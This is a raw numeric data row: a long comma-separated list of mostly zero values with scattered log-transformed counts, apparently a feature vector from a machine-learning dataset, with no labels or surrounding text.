0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 3.2188758248682006, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0.0, 4.8991863767100545, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.3322045101752034, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.812184355372417, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.1298987149230735, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 2.1972245773362196, 1.6094379124341003, 0, 0.0, 4.574710978503383, 0, 6.462743943876961, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 3.0910424533583156, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.262134127775067, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.3322045101752034, 0.0, 0, 0.0, 0.0, 11.284134957569469, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 6.821864234308754, 0, 0.0, 0.0, 0.0, 3.4965075614664802, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.471502607305074, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 4.976733742420574, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.182806904693496, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.828641396489095, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 3.8918202981106265, 0.0, 0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0, 0.0, 0.0, 2.8398715690385097, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 3.044522437723423, 0.0, 0.0, 5.846735604451319, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 3.367295829986474, 0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 4.969813299576001, 5.346437018291705, 0.0, 1.7412592803704001, 0.0, 1.7412592803704001, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.000208219919599, 2.6390573296152584, 0, 0.0, 0, 0.6931471805599453, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 4.828313737302301, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0, 0.0, 0.0, 2.3978952727983707, 0, 0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 3.6109179126442243, 0.0, 3.0841946160253877, 0.0, 0.0, 0.0, 0.0, 6.287897844304593, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.795790545596741, 0.0, 0, 8.365613809386995, 0.0, 0.0, 0.0, 0.0, 0, 3.8918202981106265, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.007333185232471, 0, 0, 0.0, 0.0, 3.9512437185814275, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.649511027115099, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.1354942159291497, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.499809670330265, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 3.2188758248682006, 0.0, 4.48863636973214, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.952096120109145, 4.828313737302301, 3.4339872044851467, 0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 4.969813299576001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.127134385045092, 0.0, 0, 6.821864234308754, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0, 8.802445120171846, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 12.404515991916155, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8501476017100584, 0.0, 16.168878379615265, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0.0, 0.0, 0, 0.0, 3.8005740880419454, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 3.7369991058576035, 0, 1.6094379124341003, 0.0, 0, 16.168230769388487, 0, 0.0, 0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4657359027997265, 0.0, 0.0, 0.0, 0.0, 4.143134726391533, 0, 0, 0.0, 4.518263445217987, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.941642422609304, 4.700480365792417, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 0, 0.0, 0.0, 0.0, 3.784189633918261, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0, 3.2188758248682006, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 2.6390573296152584, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0, 0.0, 0.0, 4.828313737302301, 0.0, 0, 0, 5.605802066295998, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 5.101797476893978, 3.0910424533583156, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.101797476893978, 4.969640753475787, 0.0, 0.0, 0, 0.0, 0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.3694478524670215, 0, 0, 0, 0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 2.70805020110221, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 1.6094379124341003, 0, 0.0, 3.2188758248682006, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.9444389791664403, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.3978952727983707, 0, 3.58351893845611, 0.0, 0.0, 0, 3.7369991058576035, 0.0, 4.02535169073515, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 3.0841946160253877, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2958368660043296, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.182806904693497, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0, 2.70805020110221, 0, 0, 0, 0.0, 10.484135188312967, 7.275172319452771, 0.0, 0, 3.0841946160253872, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 7.953835426675504, 0.0, 2.70805020110221, 0.0, 0, 0, 0, 0.0, 0.0, 9.830786204133961, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.3322045101752034, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 3.8005740880419454, 0, 0, 0, 0, 0, 0.0, 0, 2.9444389791664403, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.07753744390572, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.356107660695892, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.1354942159291497, 0, 0.0, 0, 0.0, 0, 0, 0.0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.127134385045092, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.214935757608986, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.053835369501174, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 2.1972245773362196, 0, 0.0, 2.0794415416798357, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.969640753475787, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.739792912179235, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 